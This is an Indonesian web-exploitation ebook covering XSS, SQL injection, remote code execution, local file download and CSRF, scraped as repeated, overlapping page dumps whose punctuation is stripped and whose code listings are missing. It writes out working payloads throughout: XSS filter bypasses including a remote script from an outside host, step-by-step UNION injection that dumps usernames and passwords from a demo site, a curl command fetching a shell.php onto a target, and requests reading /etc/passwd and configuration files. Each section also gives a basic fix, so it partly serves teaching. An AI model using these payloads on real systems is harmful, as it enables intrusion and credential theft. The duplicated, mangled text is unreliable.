Dengan fungsi diatas kode injeksi seperti 1rsquo+order+by+1 akan diabaikan oleh query

0x04 - Remote Code Execution

Apa itu Remote Code ExecutionRemote Command Execution adalah sebuah celah yang membuat kita terhubung padasebuah command atau terminal sistem operasi server atau hosting web tersebut Dengancelah ini kita dapat menggunakan perintah-perintah yang ada pada sistem operasi servertersebut

0x04 - Remote Code Execution

Kode yang Menimbulkan CelahRemote Code Execution dapat terjadi karena kesalahan dalam sebuah kode dan tidakadanya filter terhadap kode injeksi yang berbahaya seperti wget curl cat dan lain-lainBerikut kode yang dapat menimbulkan celah ini

Kode diatas akan menjalankan perintah dan memunculkan output(hasil dari kerja perintah)dari parameter cmd

Namun selain kode diatas ada juga kode seperti ini yang dapat menimbulakan celah

Kode diatas akan menjalankan perintah atau mengeksekusi perintah tanpa mengeluarkanoutput dari parameter cmd namun perintah tetap berjalan atau dieksekusi

0x04 - Remote Code Execution

Injeksi Remote Code ExecutionUntuk melakukan injeksi terhadap Remote Code Execution kita harus memasukan kodeinjeksi atau perintah sistem operasi (operating system) pada parameter yang ada padacelah ini

http127001cmdphpcmd=[Perintah]

Pada celah ini kita dapat menggunakan perintah sistem operasi tetapi tergantung dariserver jika server menggunakan sistem operasi windows maka perintah yang digunakanadalah perintah di windows begitu juga dengan server yang menggunakan sistem operasilinux maka akan menggunakan perintah linux

Contoh perintah untuk download file dari server lain dan menyimpannya di web targethttp127001cmdphpcmd=curl -o httpgooglecomshellphp

Perintah diatas menggunakan cURL untuk download file dari server lain

Namun bukan hanya itu saja masih banyak yang dapat dilakukan melalui celah ini antaralain1 Membuat File2 Menghapus File3 Mengcopy File4 Mengedit File5 Melihat File etcpasswd

Dan masih banyak lagi

0x04 - Remote Code Execution

Menutup Celah Remote Code ExecutionUntuk menutup celah ini kita dapat menggunakan if switch case pada kode php

Pada kode diatas kita membatasi penggunaan perintah jadi hanya perintah yang telahkita tentukan saja yang dapat berfungsi seperti perintah netstat dan ifconfig

0x05 - Local File Download

Apa itu Local File DownloadLocal File Download merupakan sebuah teknik dimana seorang penyerang dapatmendownload file-file yang ada pada web target

0x05 - Local File Download

Kode yang Menimbulkan CelahLocal File Download dapat terjadi karena kesalahan dalam sebuah kode dan tidak ada filterdalam mendownload file

Contoh kode

Kode diatas akan mendownload file yang di input dari parameter file

Selain kode diatas ada juga kode yang menimbulkan celah seperti kode dibawah ini

Kode diatas akan mendownload file yang di input dari parameter downloadfile

0x05 - Local File Download

Injeksi Local File DownloadUntuk melakukan injeksi terhadap Local File Download kita hanya perlu memasukkannama file yang ingin di download

http127001filephpdownload=[File]

Contoh InjeksiJika kita ingin mendownload file configurationphp dari sebuah web

http127001filephpdownload=configurationphp

Namun kita bukan hanya bisa download file yang ada didalam web tetapi didalam serverjuga bisa

Contoh InjeksiJika kita ingin mendownload file etcpasswd untuk melihat users yang ada pada server

http127001filephpdownload=etcpasswd

0x05 - Local File Download

Menutup Celah Local File DownloadUntuk menutup celah Local File Download kita dapat menggunakan fungsi if strpos padakode php

Kode diatas akan membatasi atau filter kode injeksi seperti etcpasswd danconfigurationphp pada parameter file

0x06 - Cross Site Request Forgery

Apa itu Cross Site Request ForgeryCross Site Request Forgery merupakan teknik pemalsuan permintaan yang berasal darihalaman web atau situs yang berbeda Cross Site Request Forgery biasanya terjadi padahalaman admin sebuah web

0x06 - Cross Site Request Forgery

Kode yang Menimbulkan CelahCross Site Request Forgery dapat terjadi karena kesalahan dalam sebuah kode dan tidakadanya session dalam sebuah kode

Contoh Misalkan terjadi pada file administratorpostphp dan file tersebut berisi kode sepertidibawah ini

Kode diatas dapat melakukan penambahan data pada database Terlihat jelas bahwa userbiasa dapat menambahkan data jika user tersebut mengetahui parameter post karenatidak adanya sebuah session

0x06 - Cross Site Request Forgery

Injeksi Cross Site Request ForgeryUntuk melakukan injeksi terhadap Cross Site Request Forgery kita harus memasukankode injeksi dan membutuhkan sebuah kode dan mengetahui parameter pada web target

Kode Exploit Cross Site Request ForgeryPada celah ini kita membutuhkan sebuah kode untuk melakukan injeksi

Contoh Jika Cross Site Request Forgery terjadi pada httpgooglecomadministratorpostphpdan terdapat pada parameter post dan name

Berikut isi kode dari httpgooglecomadministratorpostphp

Jadi kita akan membuat sebuah kode yang melakukan penyerangan ke parameter postdan name

Berikut contoh kode

Kode tersebut akan menjadi seperti ini

Lalu tinggal melakukan submit pada data yang telah di input pada form text tersebut

0x06 - Cross Site Request Forgery

Menutup Celah Cross Site Request ForgeryUntuk menutup celah ini kita hanya perlu menambahkan session pada kode php

Contoh kode

Dari kode diatas kita menambahkan fungsi session_start() dan $_SESSION pada kodeKode tersebut berfungsi untuk melakukan pemeriksaan session Jika username bukanadmin maka posting gagal

0x07 - Mengarsipkan Exploit

Membuat Keterangan Exploit untuk DikirimSetelah kita selesai menganalisis kode dan menemukan sebuah celah (vulnerability) padasuatu Content Management System (CMS) kini saatnya kita membuat keteranganmengenai exploit kita untuk diarsipkan ke beberapa exploit archive seperti 1337dayExploit-DB dan Packet Storm Security

Dalam membuat exploit kita harus memberikan keterangan seperti Title Author DateFound Version Category Vendor Tested on Vulnerability dan POC

0x07 - Mengarsipkan ExploitMembuat Keterangan Exploit untuk Dikirim

Contoh Keterangan ExploitBerikut adalah contoh dalam membuat keterangan exploit

Dalam membuat keterangan exploit jangan lupa memberikan keterangan POC yangsangat jelas

0x07 - Mengarsipkan ExploitMengirim Exploit ke 1337dayUntuk mengirim exploit yang telah kita buat ke 1337day kita harus mengirimkan sebuahemail ke pihak 1337day1 admin1337daycom2 mrinj3ct0rgmailcom

0x07 - Mengarsipkan ExploitMengirim Exploit ke Exploit-DBUntuk mengirim exploit yang telah kita buat ke Exploit-DB kita harus mengirimkan sebuahemail ke pihak Exploit-DB1 submitoffseccom

0x07 - Mengarsipkan ExploitMengirim Exploit ke Packet Storm SecurityUntuk mengirim exploit yang telah kita buat ke Packet Storm Security kita harusmengirimkan sebuah email ke pihak Packet Storm Security1 submissionspacketstormsecuritycom

Demikian yang dapat penulis paparkan mengenai materi yang menjadi pokok bahasandalam ebook ini tentunya masih banyak kekurangan dan kelemahannya

Penulis banyak berharap para pembaca memberikan kritik dan saran yang membangunkepada penulis demi sempurnanya ebook ini dalam penulisan ebook di kesempatan-kesempatan berikutnya Semoga ebook ini berguna bagi para pembaca ebook ini

Terima kasih kepada

Page 8: Basic Web Exploit Development

0x02 - Cross Site Scripting

Injeksi Cross Site Scripting dengan BypassJika dengan teknik biasa gagal atau terdapat filter terhadap kode kita dapatmenggunakan bypass

Form Searchhttp127001searchphptext=rdquogtltscriptgtalert(ldquoXSSrdquo)ltscriptgtMenambahkan tanda kutip ldquo dan gt untuk melakukan bypass

Image XSShttp127001profilephptxt=ltimg src=javascriptalert(XSS)gtMemanfaatkan kode image untuk melakukan injeksi jika kode yang lainnya di filter

Remote Scripthttp127001profilephpuser=ltscriptsrc=httphackersorgxssjsgtltscriptgtJika fungsi alert documentwrite dan yang lainnya di filter bisa menggunakan RemoteScript iniKode injeksi diisikan pada httphackersorgxssjs

Masih banyak lagi teknik untuk bypass Cross Site Scripting ini jika ingin membaca lebihlanjut silahkan baca di httpswwwowasporgindexphpXSS_Filter_Evasion_Cheat_Sheet

0x02 - Cross Site Scripting

Menutup Celah Cross Site ScriptingUntuk menutup celah ini kita dapat menggunakan fungsi php htmlspecialchars

Non Persistent

Menambahkan fungsi php htmlspecialchars pada parameter name

Persistent Stored

Kode diatas adalah contoh menutupi celah Cross Site Scripting jika kode html terdapatdidalam database dengan menambahkan htmlspecialchars pada kode yangmenampilkan hasil dari load di database

0x03 - SQL Injection

Apa itu SQL InjectionSQL Injection merupakan sebuah teknik dimana seorang penyerang dapat memasukkanperintah-perintah SQL melalui url untuk dieksekusi oleh database Dengan teknikiniseorang penyerang bisa mendapatkan data pada web target

0x03 - SQL Injection

Kode yang Menimbulkan CelahSQL Injection dapat terjadi karena kesalahan dalam sebuah kode query dan tidak adanyafilter terhadap kode injeksi seperti tanda ldquo + order+bydan lain-lain Berikut kode yangdapat menimbulkan celah ini

Jika kita memasukkan injeksi pada parameter id maka akan membuat query SQL padakode diatas berubah

Mengapa bisa berubah

Contoh Jika kita memasukkan kode injeksi pada parameter idhttp127001postphpid=1rsquo+order+by+1rsquo

Query SQL diatas akan berubah menjadi

Maka akan menyebabkan error atau vulnerability pada query SQL

0x03 - SQL Injection

Injeksi SQL InjectionUntuk melakukan injeksi terhadap SQL Injection kita harus memasukan query sql padaparameter yang terjadi pada celah ini Dalam perintah SQL ada dua tipe injeksi yaitustring dan integer String yaitu menggunakan spasi antara url dan query SQL sedangkanInteger menggunakan simbol-simbol seperti +

http127001postphpid=[Query]

Contoh melakukan injeksi SQL terhadap webTarget httptestphpvulnwebcomlistproductsphpcat=

Menghitung Jumlah TablesKita akan memasukkan query sql untuk menghitung jumlah tablesDalam menghitung tables kita akan menggunakan query order+by+jumlah dan harusmendapatkan pesan errorhttptestphpvulnwebcomlistproductsphpcat=1+order+by+1--httptestphpvulnwebcomlistproductsphpcat=1+order+by+2--httptestphpvulnwebcomlistproductsphpcat=1+order+by+3--Query diatas tidak mengakibatkan error sekarang kita coba ganti angka menjadi 12httptestphpvulnwebcomlistproductsphpcat=1+order+by+12--

Muncul pesan error pada pencarian tables ini angka 12 tadi kita kurang 1 (12 - 1 = 11)maka menjadi 11 itu berarti tables yang ada pada web ada 11

0x03 - SQL Injection

Injeksi SQL Injection

Melihat TablesKita akan memasukkan query sql untuk melihat tables yang adaDalam melihat tables kita akan menggunakan query group_concat(table_name) dan+from+information_schematables+where+table_schema=database()

httptestphpvulnwebcomlistproductsphpcat=-1+union+select+123456group_concat(table_name)891011+from+information_schematables+where+table_schema=database()

Maka akan muncul tables yang ada

Tables 1 Artists2 Carts3 Categ4 Featured5 Guestbook6 Pictures7 Products8 Users

0x03 - SQL Injection

Injeksi SQL Injection

Melihat ColumnKita akan memasukkan query sql untuk melihat column yang adaDalam melihat column kita akan menggunakan query group_concat(column_name)dan+from+information_schemacolumns+where+table_name=CHAR(Table_Decimal)

Sebelum melihat column kita harus merubah nama tables dari string menjadi decimalPada kali ini penulis menggunakan tables usersString users gt Decimal 117115101114115

httptestphpvulnwebcomlistproductsphpcat=-1+union+select+123456group_concat(column_name)891011+from+information_schemacolumns+where+table_name=CHAR(117115101114115)--

Maka akan muncul column yang ada

Column 1 Uname 7 Phone2 Pass 8 Cart3 Cc4 Address5 Email6 Name

0x03 - SQL Injection

Injeksi SQL Injection

Melihat Data dari ColumnKita akan memasukkan query sql untuk melihat data pada column yang adaDalam melihat data column kita akan menggunakan group_concat(nama_column) dan+from+[nama_table]--

Pada kali ini kita akan melihat data pada tables users dan pada column uname amp passhttptestphpvulnwebcomlistproductsphpcat=-1+union+select+123456group_concat(uname0x3apass)891011+from+users--

Maka akan muncul data pada column tersebut

Data Column Uname testPass test

0x03 - SQL Injection

Menutup Celah SQL InjectionUntuk menutup celah ini kita dapat menggunakan fungsi mysql_real_escape_stringpada parameter untuk melakukan filterasi

Menambahkan fungsi mysql_real_escape_string pada parameter id

Dengan fungsi diatas kode injeksi seperti 1rsquo+order+by+1 akan diabaikan oleh query

0x04 - Remote Code Execution

Apa itu Remote Code ExecutionRemote Command Execution adalah sebuah celah yang membuat kita terhubung padasebuah command atau terminal sistem operasi server atau hosting web tersebut Dengancelah ini kita dapat menggunakan perintah-perintah yang ada pada sistem operasi servertersebut

0x04 - Remote Code Execution

Kode yang Menimbulkan CelahRemote Code Execution dapat terjadi karena kesalahan dalam sebuah kode dan tidakadanya filter terhadap kode injeksi yang berbahaya seperti wget curl cat dan lain-lainBerikut kode yang dapat menimbulkan celah ini

Kode diatas akan menjalankan perintah dan memunculkan output(hasil dari kerja perintah)dari parameter cmd

Namun selain kode diatas ada juga kode seperti ini yang dapat menimbulakan celah

Kode diatas akan menjalankan perintah atau mengeksekusi perintah tanpa mengeluarkanoutput dari parameter cmd namun perintah tetap berjalan atau dieksekusi

0x04 - Remote Code Execution

Injeksi Remote Code ExecutionUntuk melakukan injeksi terhadap Remote Code Execution kita harus memasukan kodeinjeksi atau perintah sistem operasi (operating system) pada parameter yang ada padacelah ini

http127001cmdphpcmd=[Perintah]

Pada celah ini kita dapat menggunakan perintah sistem operasi tetapi tergantung dariserver jika server menggunakan sistem operasi windows maka perintah yang digunakanadalah perintah di windows begitu juga dengan server yang menggunakan sistem operasilinux maka akan menggunakan perintah linux

Contoh perintah untuk download file dari server lain dan menyimpannya di web targethttp127001cmdphpcmd=curl -o httpgooglecomshellphp

Perintah diatas menggunakan cURL untuk download file dari server lain

Namun bukan hanya itu saja masih banyak yang dapat dilakukan melalui celah ini antaralain1 Membuat File2 Menghapus File3 Mengcopy File4 Mengedit File5 Melihat File etcpasswd

Dan masih banyak lagi

0x04 - Remote Code Execution

Menutup Celah Remote Code ExecutionUntuk menutup celah ini kita dapat menggunakan if switch case pada kode php

Pada kode diatas kita membatasi penggunaan perintah jadi hanya perintah yang telahkita tentukan saja yang dapat berfungsi seperti perintah netstat dan ifconfig

0x05 - Local File Download

Apa itu Local File DownloadLocal File Download merupakan sebuah teknik dimana seorang penyerang dapatmendownload file-file yang ada pada web target

0x05 - Local File Download

Kode yang Menimbulkan CelahLocal File Download dapat terjadi karena kesalahan dalam sebuah kode dan tidak ada filterdalam mendownload file

Contoh kode

Kode diatas akan mendownload file yang di input dari parameter file

Selain kode diatas ada juga kode yang menimbulkan celah seperti kode dibawah ini

Kode diatas akan mendownload file yang di input dari parameter downloadfile

0x05 - Local File Download

Injeksi Local File DownloadUntuk melakukan injeksi terhadap Local File Download kita hanya perlu memasukkannama file yang ingin di download

http127001filephpdownload=[File]

Contoh InjeksiJika kita ingin mendownload file configurationphp dari sebuah web

http127001filephpdownload=configurationphp

Namun kita bukan hanya bisa download file yang ada didalam web tetapi didalam serverjuga bisa

Contoh InjeksiJika kita ingin mendownload file etcpasswd untuk melihat users yang ada pada server

http127001filephpdownload=etcpasswd

0x05 - Local File Download

Menutup Celah Local File DownloadUntuk menutup celah Local File Download kita dapat menggunakan fungsi if strpos padakode php

Kode diatas akan membatasi atau filter kode injeksi seperti etcpasswd danconfigurationphp pada parameter file

0x06 - Cross Site Request Forgery

Apa itu Cross Site Request ForgeryCross Site Request Forgery merupakan teknik pemalsuan permintaan yang berasal darihalaman web atau situs yang berbeda Cross Site Request Forgery biasanya terjadi padahalaman admin sebuah web

0x06 - Cross Site Request Forgery

Kode yang Menimbulkan CelahCross Site Request Forgery dapat terjadi karena kesalahan dalam sebuah kode dan tidakadanya session dalam sebuah kode

Contoh Misalkan terjadi pada file administratorpostphp dan file tersebut berisi kode sepertidibawah ini

Kode diatas dapat melakukan penambahan data pada database Terlihat jelas bahwa userbiasa dapat menambahkan data jika user tersebut mengetahui parameter post karenatidak adanya sebuah session

0x06 - Cross Site Request Forgery

Injeksi Cross Site Request ForgeryUntuk melakukan injeksi terhadap Cross Site Request Forgery kita harus memasukankode injeksi dan membutuhkan sebuah kode dan mengetahui parameter pada web target

Kode Exploit Cross Site Request ForgeryPada celah ini kita membutuhkan sebuah kode untuk melakukan injeksi

Contoh Jika Cross Site Request Forgery terjadi pada httpgooglecomadministratorpostphpdan terdapat pada parameter post dan name

Berikut isi kode dari httpgooglecomadministratorpostphp

Jadi kita akan membuat sebuah kode yang melakukan penyerangan ke parameter postdan name

Berikut contoh kode

Kode tersebut akan menjadi seperti ini

Lalu tinggal melakukan submit pada data yang telah di input pada form text tersebut

0x06 - Cross Site Request Forgery

Menutup Celah Cross Site Request ForgeryUntuk menutup celah ini kita hanya perlu menambahkan session pada kode php

Contoh kode

Dari kode diatas kita menambahkan fungsi session_start() dan $_SESSION pada kodeKode tersebut berfungsi untuk melakukan pemeriksaan session Jika username bukanadmin maka posting gagal

0x07 - Mengarsipkan Exploit

Membuat Keterangan Exploit untuk DikirimSetelah kita selesai menganalisis kode dan menemukan sebuah celah (vulnerability) padasuatu Content Management System (CMS) kini saatnya kita membuat keteranganmengenai exploit kita untuk diarsipkan ke beberapa exploit archive seperti 1337dayExploit-DB dan Packet Storm Security

Dalam membuat exploit kita harus memberikan keterangan seperti Title Author DateFound Version Category Vendor Tested on Vulnerability dan POC

0x07 - Mengarsipkan ExploitMembuat Keterangan Exploit untuk Dikirim

Contoh Keterangan ExploitBerikut adalah contoh dalam membuat keterangan exploit

Dalam membuat keterangan exploit jangan lupa memberikan keterangan POC yangsangat jelas

0x07 - Mengarsipkan ExploitMengirim Exploit ke 1337dayUntuk mengirim exploit yang telah kita buat ke 1337day kita harus mengirimkan sebuahemail ke pihak 1337day1 admin1337daycom2 mrinj3ct0rgmailcom

0x07 - Mengarsipkan ExploitMengirim Exploit ke Exploit-DBUntuk mengirim exploit yang telah kita buat ke Exploit-DB kita harus mengirimkan sebuahemail ke pihak Exploit-DB1 submitoffseccom

0x07 - Mengarsipkan ExploitMengirim Exploit ke Packet Storm SecurityUntuk mengirim exploit yang telah kita buat ke Packet Storm Security kita harusmengirimkan sebuah email ke pihak Packet Storm Security1 submissionspacketstormsecuritycom

Demikian yang dapat penulis paparkan mengenai materi yang menjadi pokok bahasandalam ebook ini tentunya masih banyak kekurangan dan kelemahannya

Penulis banyak berharap para pembaca memberikan kritik dan saran yang membangunkepada penulis demi sempurnanya ebook ini dalam penulisan ebook di kesempatan-kesempatan berikutnya Semoga ebook ini berguna bagi para pembaca ebook ini

Terima kasih kepada

Page 9: Basic Web Exploit Development

0x02 - Cross Site Scripting

Menutup Celah Cross Site ScriptingUntuk menutup celah ini kita dapat menggunakan fungsi php htmlspecialchars

Non Persistent

Menambahkan fungsi php htmlspecialchars pada parameter name

Persistent Stored

Kode diatas adalah contoh menutupi celah Cross Site Scripting jika kode html terdapatdidalam database dengan menambahkan htmlspecialchars pada kode yangmenampilkan hasil dari load di database

0x03 - SQL Injection

Apa itu SQL InjectionSQL Injection merupakan sebuah teknik dimana seorang penyerang dapat memasukkanperintah-perintah SQL melalui url untuk dieksekusi oleh database Dengan teknikiniseorang penyerang bisa mendapatkan data pada web target

0x03 - SQL Injection

Kode yang Menimbulkan CelahSQL Injection dapat terjadi karena kesalahan dalam sebuah kode query dan tidak adanyafilter terhadap kode injeksi seperti tanda ldquo + order+bydan lain-lain Berikut kode yangdapat menimbulkan celah ini

Jika kita memasukkan injeksi pada parameter id maka akan membuat query SQL padakode diatas berubah

Mengapa bisa berubah

Contoh Jika kita memasukkan kode injeksi pada parameter idhttp127001postphpid=1rsquo+order+by+1rsquo

Query SQL diatas akan berubah menjadi

Maka akan menyebabkan error atau vulnerability pada query SQL

0x03 - SQL Injection

Injeksi SQL InjectionUntuk melakukan injeksi terhadap SQL Injection kita harus memasukan query sql padaparameter yang terjadi pada celah ini Dalam perintah SQL ada dua tipe injeksi yaitustring dan integer String yaitu menggunakan spasi antara url dan query SQL sedangkanInteger menggunakan simbol-simbol seperti +

http127001postphpid=[Query]

Contoh melakukan injeksi SQL terhadap webTarget httptestphpvulnwebcomlistproductsphpcat=

Menghitung Jumlah TablesKita akan memasukkan query sql untuk menghitung jumlah tablesDalam menghitung tables kita akan menggunakan query order+by+jumlah dan harusmendapatkan pesan errorhttptestphpvulnwebcomlistproductsphpcat=1+order+by+1--httptestphpvulnwebcomlistproductsphpcat=1+order+by+2--httptestphpvulnwebcomlistproductsphpcat=1+order+by+3--Query diatas tidak mengakibatkan error sekarang kita coba ganti angka menjadi 12httptestphpvulnwebcomlistproductsphpcat=1+order+by+12--

Muncul pesan error pada pencarian tables ini angka 12 tadi kita kurang 1 (12 - 1 = 11)maka menjadi 11 itu berarti tables yang ada pada web ada 11

0x03 - SQL Injection

Injeksi SQL Injection

Melihat TablesKita akan memasukkan query sql untuk melihat tables yang adaDalam melihat tables kita akan menggunakan query group_concat(table_name) dan+from+information_schematables+where+table_schema=database()

httptestphpvulnwebcomlistproductsphpcat=-1+union+select+123456group_concat(table_name)891011+from+information_schematables+where+table_schema=database()

Maka akan muncul tables yang ada

Tables 1 Artists2 Carts3 Categ4 Featured5 Guestbook6 Pictures7 Products8 Users

0x03 - SQL Injection

Injeksi SQL Injection

Melihat ColumnKita akan memasukkan query sql untuk melihat column yang adaDalam melihat column kita akan menggunakan query group_concat(column_name)dan+from+information_schemacolumns+where+table_name=CHAR(Table_Decimal)

Sebelum melihat column kita harus merubah nama tables dari string menjadi decimalPada kali ini penulis menggunakan tables usersString users gt Decimal 117115101114115

httptestphpvulnwebcomlistproductsphpcat=-1+union+select+123456group_concat(column_name)891011+from+information_schemacolumns+where+table_name=CHAR(117115101114115)--

Maka akan muncul column yang ada

Column 1 Uname 7 Phone2 Pass 8 Cart3 Cc4 Address5 Email6 Name

0x03 - SQL Injection

Injeksi SQL Injection

Melihat Data dari ColumnKita akan memasukkan query sql untuk melihat data pada column yang adaDalam melihat data column kita akan menggunakan group_concat(nama_column) dan+from+[nama_table]--

Pada kali ini kita akan melihat data pada tables users dan pada column uname amp passhttptestphpvulnwebcomlistproductsphpcat=-1+union+select+123456group_concat(uname0x3apass)891011+from+users--

Maka akan muncul data pada column tersebut

Data Column Uname testPass test

0x03 - SQL Injection

Menutup Celah SQL InjectionUntuk menutup celah ini kita dapat menggunakan fungsi mysql_real_escape_stringpada parameter untuk melakukan filterasi

Menambahkan fungsi mysql_real_escape_string pada parameter id

Dengan fungsi diatas kode injeksi seperti 1rsquo+order+by+1 akan diabaikan oleh query

0x04 - Remote Code Execution

Apa itu Remote Code ExecutionRemote Command Execution adalah sebuah celah yang membuat kita terhubung padasebuah command atau terminal sistem operasi server atau hosting web tersebut Dengancelah ini kita dapat menggunakan perintah-perintah yang ada pada sistem operasi servertersebut

0x04 - Remote Code Execution

Kode yang Menimbulkan CelahRemote Code Execution dapat terjadi karena kesalahan dalam sebuah kode dan tidakadanya filter terhadap kode injeksi yang berbahaya seperti wget curl cat dan lain-lainBerikut kode yang dapat menimbulkan celah ini

Kode diatas akan menjalankan perintah dan memunculkan output(hasil dari kerja perintah)dari parameter cmd

Namun selain kode diatas ada juga kode seperti ini yang dapat menimbulakan celah

Kode diatas akan menjalankan perintah atau mengeksekusi perintah tanpa mengeluarkanoutput dari parameter cmd namun perintah tetap berjalan atau dieksekusi

0x04 - Remote Code Execution

Injeksi Remote Code ExecutionUntuk melakukan injeksi terhadap Remote Code Execution kita harus memasukan kodeinjeksi atau perintah sistem operasi (operating system) pada parameter yang ada padacelah ini

http127001cmdphpcmd=[Perintah]

Pada celah ini kita dapat menggunakan perintah sistem operasi tetapi tergantung dariserver jika server menggunakan sistem operasi windows maka perintah yang digunakanadalah perintah di windows begitu juga dengan server yang menggunakan sistem operasilinux maka akan menggunakan perintah linux

Contoh perintah untuk download file dari server lain dan menyimpannya di web targethttp127001cmdphpcmd=curl -o httpgooglecomshellphp

Perintah diatas menggunakan cURL untuk download file dari server lain

Namun bukan hanya itu saja masih banyak yang dapat dilakukan melalui celah ini antaralain1 Membuat File2 Menghapus File3 Mengcopy File4 Mengedit File5 Melihat File etcpasswd

Dan masih banyak lagi

0x04 - Remote Code Execution

Menutup Celah Remote Code ExecutionUntuk menutup celah ini kita dapat menggunakan if switch case pada kode php

Pada kode diatas kita membatasi penggunaan perintah jadi hanya perintah yang telahkita tentukan saja yang dapat berfungsi seperti perintah netstat dan ifconfig

0x05 - Local File Download

Apa itu Local File DownloadLocal File Download merupakan sebuah teknik dimana seorang penyerang dapatmendownload file-file yang ada pada web target

0x05 - Local File Download

Kode yang Menimbulkan CelahLocal File Download dapat terjadi karena kesalahan dalam sebuah kode dan tidak ada filterdalam mendownload file

Contoh kode

Kode diatas akan mendownload file yang di input dari parameter file

Selain kode diatas ada juga kode yang menimbulkan celah seperti kode dibawah ini

Kode diatas akan mendownload file yang di input dari parameter downloadfile

0x05 - Local File Download

Injeksi Local File DownloadUntuk melakukan injeksi terhadap Local File Download kita hanya perlu memasukkannama file yang ingin di download

http127001filephpdownload=[File]

Contoh InjeksiJika kita ingin mendownload file configurationphp dari sebuah web

http127001filephpdownload=configurationphp

Namun kita bukan hanya bisa download file yang ada didalam web tetapi didalam serverjuga bisa

Contoh InjeksiJika kita ingin mendownload file etcpasswd untuk melihat users yang ada pada server

http127001filephpdownload=etcpasswd

0x05 - Local File Download

Menutup Celah Local File DownloadUntuk menutup celah Local File Download kita dapat menggunakan fungsi if strpos padakode php

Kode diatas akan membatasi atau filter kode injeksi seperti etcpasswd danconfigurationphp pada parameter file

0x06 - Cross Site Request Forgery

Apa itu Cross Site Request ForgeryCross Site Request Forgery merupakan teknik pemalsuan permintaan yang berasal darihalaman web atau situs yang berbeda Cross Site Request Forgery biasanya terjadi padahalaman admin sebuah web

0x06 - Cross Site Request Forgery

Kode yang Menimbulkan CelahCross Site Request Forgery dapat terjadi karena kesalahan dalam sebuah kode dan tidakadanya session dalam sebuah kode

Contoh Misalkan terjadi pada file administratorpostphp dan file tersebut berisi kode sepertidibawah ini

Kode diatas dapat melakukan penambahan data pada database Terlihat jelas bahwa userbiasa dapat menambahkan data jika user tersebut mengetahui parameter post karenatidak adanya sebuah session

0x06 - Cross Site Request Forgery

Injeksi Cross Site Request ForgeryUntuk melakukan injeksi terhadap Cross Site Request Forgery kita harus memasukankode injeksi dan membutuhkan sebuah kode dan mengetahui parameter pada web target

Kode Exploit Cross Site Request ForgeryPada celah ini kita membutuhkan sebuah kode untuk melakukan injeksi

Contoh Jika Cross Site Request Forgery terjadi pada httpgooglecomadministratorpostphpdan terdapat pada parameter post dan name

Berikut isi kode dari httpgooglecomadministratorpostphp

Jadi kita akan membuat sebuah kode yang melakukan penyerangan ke parameter postdan name

Berikut contoh kode

Kode tersebut akan menjadi seperti ini

Lalu tinggal melakukan submit pada data yang telah di input pada form text tersebut

0x06 - Cross Site Request Forgery

Menutup Celah Cross Site Request ForgeryUntuk menutup celah ini kita hanya perlu menambahkan session pada kode php

Contoh kode

Dari kode diatas kita menambahkan fungsi session_start() dan $_SESSION pada kodeKode tersebut berfungsi untuk melakukan pemeriksaan session Jika username bukanadmin maka posting gagal

0x07 - Mengarsipkan Exploit

Membuat Keterangan Exploit untuk DikirimSetelah kita selesai menganalisis kode dan menemukan sebuah celah (vulnerability) padasuatu Content Management System (CMS) kini saatnya kita membuat keteranganmengenai exploit kita untuk diarsipkan ke beberapa exploit archive seperti 1337dayExploit-DB dan Packet Storm Security

Dalam membuat exploit kita harus memberikan keterangan seperti Title Author DateFound Version Category Vendor Tested on Vulnerability dan POC

0x07 - Mengarsipkan ExploitMembuat Keterangan Exploit untuk Dikirim

Contoh Keterangan ExploitBerikut adalah contoh dalam membuat keterangan exploit

Dalam membuat keterangan exploit jangan lupa memberikan keterangan POC yangsangat jelas

0x07 - Mengarsipkan ExploitMengirim Exploit ke 1337dayUntuk mengirim exploit yang telah kita buat ke 1337day kita harus mengirimkan sebuahemail ke pihak 1337day1 admin1337daycom2 mrinj3ct0rgmailcom

0x07 - Mengarsipkan ExploitMengirim Exploit ke Exploit-DBUntuk mengirim exploit yang telah kita buat ke Exploit-DB kita harus mengirimkan sebuahemail ke pihak Exploit-DB1 submitoffseccom

0x07 - Mengarsipkan ExploitMengirim Exploit ke Packet Storm SecurityUntuk mengirim exploit yang telah kita buat ke Packet Storm Security kita harusmengirimkan sebuah email ke pihak Packet Storm Security1 submissionspacketstormsecuritycom

Demikian yang dapat penulis paparkan mengenai materi yang menjadi pokok bahasandalam ebook ini tentunya masih banyak kekurangan dan kelemahannya

Penulis banyak berharap para pembaca memberikan kritik dan saran yang membangunkepada penulis demi sempurnanya ebook ini dalam penulisan ebook di kesempatan-kesempatan berikutnya Semoga ebook ini berguna bagi para pembaca ebook ini

Terima kasih kepada

Page 10: Basic Web Exploit Development

0x03 - SQL Injection

Apa itu SQL InjectionSQL Injection merupakan sebuah teknik dimana seorang penyerang dapat memasukkanperintah-perintah SQL melalui url untuk dieksekusi oleh database Dengan teknikiniseorang penyerang bisa mendapatkan data pada web target

0x03 - SQL Injection

Kode yang Menimbulkan CelahSQL Injection dapat terjadi karena kesalahan dalam sebuah kode query dan tidak adanyafilter terhadap kode injeksi seperti tanda ldquo + order+bydan lain-lain Berikut kode yangdapat menimbulkan celah ini

Jika kita memasukkan injeksi pada parameter id maka akan membuat query SQL padakode diatas berubah

Mengapa bisa berubah

Contoh Jika kita memasukkan kode injeksi pada parameter idhttp127001postphpid=1rsquo+order+by+1rsquo

Query SQL diatas akan berubah menjadi

Maka akan menyebabkan error atau vulnerability pada query SQL

0x03 - SQL Injection

Injeksi SQL InjectionUntuk melakukan injeksi terhadap SQL Injection kita harus memasukan query sql padaparameter yang terjadi pada celah ini Dalam perintah SQL ada dua tipe injeksi yaitustring dan integer String yaitu menggunakan spasi antara url dan query SQL sedangkanInteger menggunakan simbol-simbol seperti +

http127001postphpid=[Query]

Contoh melakukan injeksi SQL terhadap webTarget httptestphpvulnwebcomlistproductsphpcat=

Menghitung Jumlah TablesKita akan memasukkan query sql untuk menghitung jumlah tablesDalam menghitung tables kita akan menggunakan query order+by+jumlah dan harusmendapatkan pesan errorhttptestphpvulnwebcomlistproductsphpcat=1+order+by+1--httptestphpvulnwebcomlistproductsphpcat=1+order+by+2--httptestphpvulnwebcomlistproductsphpcat=1+order+by+3--Query diatas tidak mengakibatkan error sekarang kita coba ganti angka menjadi 12httptestphpvulnwebcomlistproductsphpcat=1+order+by+12--

Muncul pesan error pada pencarian tables ini angka 12 tadi kita kurang 1 (12 - 1 = 11)maka menjadi 11 itu berarti tables yang ada pada web ada 11

0x03 - SQL Injection

Injeksi SQL Injection

Melihat TablesKita akan memasukkan query sql untuk melihat tables yang adaDalam melihat tables kita akan menggunakan query group_concat(table_name) dan+from+information_schematables+where+table_schema=database()

